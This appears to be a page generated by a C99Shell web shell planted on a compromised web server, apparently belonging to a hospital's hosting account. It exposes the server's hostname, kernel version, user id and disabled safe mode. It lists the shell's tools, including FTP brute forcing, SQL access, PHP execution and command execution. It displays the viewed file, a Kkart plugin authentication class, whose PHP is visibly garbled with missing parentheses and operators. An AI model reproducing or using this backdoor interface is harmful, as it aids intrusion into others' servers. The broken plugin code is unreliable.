!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: Apache. PHP/7.3.33 

uname -a: Linux acloudg.aryanict.com 4.18.0-513.9.1.lve.el8.x86_64 #1 SMP Mon Dec 4 15:01:22 UTC
2023 x86_64 

uid=1095(katebhospital) gid=1098(katebhospital) groups=1098(katebhospital) 

Safe-mode: OFF (not secure)

/var/softaculous/sitepad/editor/site-data/plugins/kkart-pro/includes/   drwxr-xr-x
Free 290.28 GB of 429.69 GB (67.56%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     class-kkart-auth.php (11.66 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/**
 * Kkart Auth
 *
 * Handles kkart-auth endpoint requests.
 *
 * @package Kkart\RestApi
 * @since   2.4.0
 */

defined'ABSPATH' ) || exit;

/**
 * Auth class.
 */
class KKART_Auth {

    /**
     * Version.
     *
     * @var int
     */
    const VERSION 1;

    /**
     * Setup class.
     *
     * @since 2.4.0
     */
    public function __construct() {
        // Add query vars.
        add_filter'query_vars', array( $this'add_query_vars' ), );

        // Register auth endpoint.
        add_action'init', array( __CLASS__'add_endpoint' ), );

        // Handle auth requests.
        add_action'parse_request', array( $this'handle_auth_requests' ), );
    }

    /**
     * Add query vars.
     *
     * @since  2.4.0
     * @param  array $vars Query variables.
     * @return string[]
     */
    public function add_query_vars$vars ) {
        $vars[] = 'kkart-auth-version';
        $vars[] = 'kkart-auth-route';
        return $vars;
    }

    /**
     * Add auth endpoint.
     *
     * @since 2.4.0
     */
    public static function add_endpoint() {
        add_rewrite_rule'^kkart-auth/v([1]{1})/(.*)?''index.php?kkart-auth-version=$matches[1]&kkart-auth-route=$matches[2]''top' );
    }

    /**
     * Get scope name.
     *
     * @since 2.4.0
     * @param  string $scope Permission scope.
     * @return string
     */
    protected function get_i18n_scope$scope ) {
        $permissions = array(
            'read'       => __'Read''kkart' ),
            'write'      => __'Write''kkart' ),
            'read_write' => __'Read/Write''kkart' ),
        );

        return $permissions$scope ];
    }

    /**
     * Return a list of permissions a scope allows.
     *
     * @since  2.4.0
     * @param  string $scope Permission scope.
     * @return array
     */
    protected function get_permissions_in_scope$scope ) {
        $permissions = array();
        switch ( $scope ) {
            case 'read':
                $permissions[] = __'View coupons''kkart' );
                $permissions[] = __'View customers''kkart' );
                $permissions[] = __'View orders and sales reports''kkart' );
                $permissions[] = __'View products''kkart' );
                break;
            case 'write':
                $permissions[] = __'Create webhooks''kkart' );
                $permissions[] = __'Create coupons''kkart' );
                $permissions[] = __'Create customers''kkart' );
                $permissions[] = __'Create orders''kkart' );
                $permissions[] = __'Create products''kkart' );
                break;
            case 'read_write':
                $permissions[] = __'Create webhooks''kkart' );
                $permissions[] = __'View and manage coupons''kkart' );
                $permissions[] = __'View and manage customers''kkart' );
                $permissions[] = __'View and manage orders and sales reports''kkart' );
                $permissions[] = __'View and manage products''kkart' );
                break;
        }
        return apply_filters'kkart_api_permissions_in_scope'$permissions$scope );
    }

    /**
     * Build auth urls.
     *
     * @since  2.4.0
     * @param  array  $data     Data to build URL.
     * @param  string $endpoint Endpoint.
     * @return string
     */
    protected function build_url$data$endpoint ) {
        $url kkart_get_endpoint_url'kkart-auth/v' self::VERSION$endpointhome_url'/' ) );

        return add_query_arg(
            array(
                'app_name'     => kkart_clean$data['app_name'] ),
                'user_id'      => kkart_clean$data['user_id'] ),
                'return_url'   => rawurlencode$this->get_formatted_url$data['return_url'] ) ),
                'callback_url' => rawurlencode$this->get_formatted_url$data['callback_url'] ) ),
                'scope'        => kkart_clean$data['scope'] ),
            ), $url
        );
    }

    /**
     * Decode and format a URL.
     *
     * @param  string $url URL.
     * @return string
     */
    protected function get_formatted_url$url ) {
        $url urldecode$url );

        if ( ! strstr$url'://' ) ) {
            $url 'https://' $url;
        }

        return $url;
    }

    /**
     * Make validation.
     *
     * @since  2.4.0
     * @throws Exception When validate fails.
     */
    protected function make_validation() {
        $data   = array();
        $params = array(
            'app_name',
            'user_id',
            'return_url',
            'callback_url',
            'scope',
        );

        foreach ( $params as $param ) {
            if ( empty( $_REQUEST$param ] ) ) { // WPCS: input var ok, CSRF ok.
                /* translators: %s: parameter */
                throw new Exceptionsprintf__'Missing parameter %s''kkart' ), $param ) );
            }

            $data$param ] = wp_unslash$_REQUEST$param ] ); // WPCS: input var ok, CSRF ok, sanitization ok.
        }

        if ( ! in_array$data['scope'], array( 'read''write''read_write' ), true ) ) {
            /* translators: %s: scope */
            throw new Exceptionsprintf__'Invalid scope %s''kkart' ), kkart_clean$data['scope'] ) ) );
        }

        foreach ( array( 'return_url''callback_url' ) as $param ) {
            $param $this->get_formatted_url$data$param ] );

            if ( false === filter_var$paramFILTER_VALIDATE_URL ) ) {
                /* translators: %s: url */
                throw new Exceptionsprintf__'The %s is not a valid URL''kkart' ), $param ) );
            }
        }

        $callback_url $this->get_formatted_url$data['callback_url'] );

        if ( !== stripos$callback_url'https://' ) ) {
            throw new Exception__'The callback_url needs to be over SSL''kkart' ) );
        }
    }

    /**
     * Create keys.
     *
     * @since  2.4.0
     *
     * @param  string $app_name    App name.
     * @param  string $app_user_id User ID.
     * @param  string $scope       Scope.
     *
     * @return array
     */
    protected function create_keys$app_name$app_user_id$scope ) {
        global $wpdb;

        $description sprintf(
            /* translators: 1: app name 2: scope 3: date 4: time */
            __'%1$s - API %2$s (created on %3$s at %4$s).''kkart' ),
            kkart_clean$app_name ),
            $this->get_i18n_scope$scope ),
            date_i18nkkart_date_format() ),
            date_i18nkkart_time_format() )
        );
        $user wp_get_current_user();

        // Created API keys.
        $permissions     in_array$scope, array( 'read''write''read_write' ), true ) ? sanitize_text_field$scope ) : 'read';
        $consumer_key    'ck_' kkart_rand_hash();
        $consumer_secret 'cs_' kkart_rand_hash();

        $wpdb->insert(
            $wpdb->prefix 'kkart_api_keys',
            array(
                'user_id'         => $user->ID,
                'description'     => $description,
                'permissions'     => $permissions,
                'consumer_key'    => kkart_api_hash$consumer_key ),
                'consumer_secret' => $consumer_secret,
                'truncated_key'   => substr$consumer_key, -),
            ),
            array(
                '%d',
                '%s',
                '%s',
                '%s',
                '%s',
                '%s',
            )
        );

        return array(
            'key_id'          => $wpdb->insert_id,
            'user_id'         => $app_user_id,
            'consumer_key'    => $consumer_key,
            'consumer_secret' => $consumer_secret,
            'key_permissions' => $permissions,
        );
    }

    /**
     * Post consumer data.
     *
     * @since  2.4.0
     *
     * @throws Exception When validation fails.
     * @param  array  $consumer_data Consumer data.
     * @param  string $url           URL.
     * @return bool
     */
    protected function post_consumer_data$consumer_data$url ) {
        $params = array(
            'body'    => wp_json_encode$consumer_data ),
            'timeout' => 60,
            'headers' => array(
                'Content-Type' => 'application/json;charset=' get_bloginfo'charset' ),
            ),
        );

        $response wp_safe_remote_postesc_url_raw$url ), $params );

        if ( is_wp_error$response ) ) {
            throw new Exception$response->get_error_message() );
        } elseif ( 200 !== intval$response['response']['code'] ) ) {
            throw new Exception__'An error occurred in the request and at the time were unable to send the consumer data''kkart' ) );
        }

        return true;
    }

    /**
     * Handle auth requests.
     *
     * @since 2.4.0
     * @throws Exception When auth_endpoint validation fails.
     */
    public function handle_auth_requests() {
        global $wp;

        if ( ! empty( $_GET['kkart-auth-version'] ) ) { // WPCS: input var ok, CSRF ok.
            $wp->query_vars['kkart-auth-version'] = kkart_cleanwp_unslash$_GET['kkart-auth-version'] ) ); // WPCS: input var ok, CSRF ok.
        }

        if ( ! empty( $_GET['kkart-auth-route'] ) ) { // WPCS: input var ok, CSRF ok.
            $wp->query_vars['kkart-auth-route'] = kkart_cleanwp_unslash$_GET['kkart-auth-route'] ) ); // WPCS: input var ok, CSRF ok.
        }

        // kkart-auth endpoint requests.
        if ( ! empty( $wp->query_vars['kkart-auth-version'] ) && ! empty( $wp->query_vars['kkart-auth-route'] ) ) {
            $this->auth_endpoint$wp->query_vars['kkart-auth-route'] );
        }
    }

    /**
     * Auth endpoint.
     *
     * @since 2.4.0
     * @throws Exception When validation fails.
     * @param string $route Route.
     */
    protected function auth_endpoint$route ) {
        ob_start();

        $consumer_data = array();

        try {
            $route strtolowerkkart_clean$route ) );
            $this->make_validation();

            $data wp_unslash$_REQUEST ); // WPCS: input var ok, CSRF ok.

            // Login endpoint.
            if ( 'login' === $route && ! is_user_logged_in() ) {
                kkart_get_template(
                    'auth/form-login.php', array(
                        'app_name'     => kkart_clean$data['app_name'] ),
                        'return_url'   => add_query_arg(
                            array(
                                'success' => 0,
                                'user_id' => kkart_clean$data['user_id'] ),
                            ), $this->get_formatted_url$data['return_url'] )
                        ),
                        'redirect_url' => $this->build_url$data'authorize' ),
                    )
                );
                exit;

            } elseif ( 'login' === $route && is_user_logged_in() ) {
                // Redirect with user is logged in.
                wp_redirectesc_url_raw$this->build_url$data'authorize' ) ) );
                exit;

            } elseif ( 'authorize' === $route && ! is_user_logged_in() ) {
                // Redirect with user is not logged in and trying to access the authorize endpoint.
                wp_redirectesc_url_raw$this->build_url$data'login' ) ) );
                exit;

            } elseif ( 'authorize' === $route && current_user_can'manage_kkart' ) ) {
                // Authorize endpoint.
                kkart_get_template(
                    'auth/form-grant-access.php', array(
                        'app_name'    => kkart_clean$data['app_name'] ),
                        'return_url'  => add_query_arg(
                            array(
                                'success' => 0,
                                'user_id' => kkart_clean$data['user_id'] ),
                            ), $this->get_formatted_url$data['return_url'] )
                        ),
                        'scope'       => $this->get_i18n_scopekkart_clean$data['scope'] ) ),
                        'permissions' => $this->get_permissions_in_scopekkart_clean$data['scope'] ) ),
                        'granted_url' => wp_nonce_url$this->build_url$data'access_granted' ), 'kkart_auth_grant_access''kkart_auth_nonce' ),
                        'logout_url'  => wp_logout_url$this->build_url$data'login' ) ),
                        'user'        => wp_get_current_user(),
                    )
                );
                exit;

            } elseif ( 'access_granted' === $route && current_user_can'manage_kkart' ) ) {
                // Granted access endpoint.
                if ( ! isset( $_GET['kkart_auth_nonce'] ) || ! wp_verify_noncesanitize_keywp_unslash$_GET['kkart_auth_nonce'] ) ), 'kkart_auth_grant_access' ) ) { // WPCS: input var ok.
                    throw new Exception__'Invalid nonce verification''kkart' ) );
                }

                $consumer_data $this->create_keys$data['app_name'], $data['user_id'], $data['scope'] );
                $response      $this->post_consumer_data$consumer_data$this->get_formatted_url$data['callback_url'] ) );

                if ( $response ) {
                    wp_redirect(
                        esc_url_raw(
                            add_query_arg(
                                array(
                                    'success' => 1,
                                    'user_id' => kkart_clean$data['user_id'] ),
                                ), $this->get_formatted_url$data['return_url'] )
                            )
                        )
                    );
                    exit;
                }
            } else {
                throw new Exception__'You do not have permission to access this page''kkart' ) );
            }
        } catch ( Exception $e ) {
            $this->maybe_delete_key$consumer_data );

            /* translators: %s: error message */
            wp_diesprintfesc_html__'Error: %s.''kkart' ), esc_html$e->getMessage() ) ), esc_html__'Access denied''kkart' ), array( 'response' => 401 ) );
        }
    }

    /**
     * Maybe delete key.
     *
     * @since 2.4.0
     *
     * @param array $key Key.
     */
    private function maybe_delete_key$key ) {
        global $wpdb;

        if ( isset( $key['key_id'] ) ) {
            $wpdb->delete$wpdb->prefix 'kkart_api_keys', array( 'key_id' => $key['key_id'] ), array( '%d' ) );
        }
    }
}
new KKART_Auth();

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 
:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by KaizenLouie | C99Shell Github | Generation time: 0.0048 ]--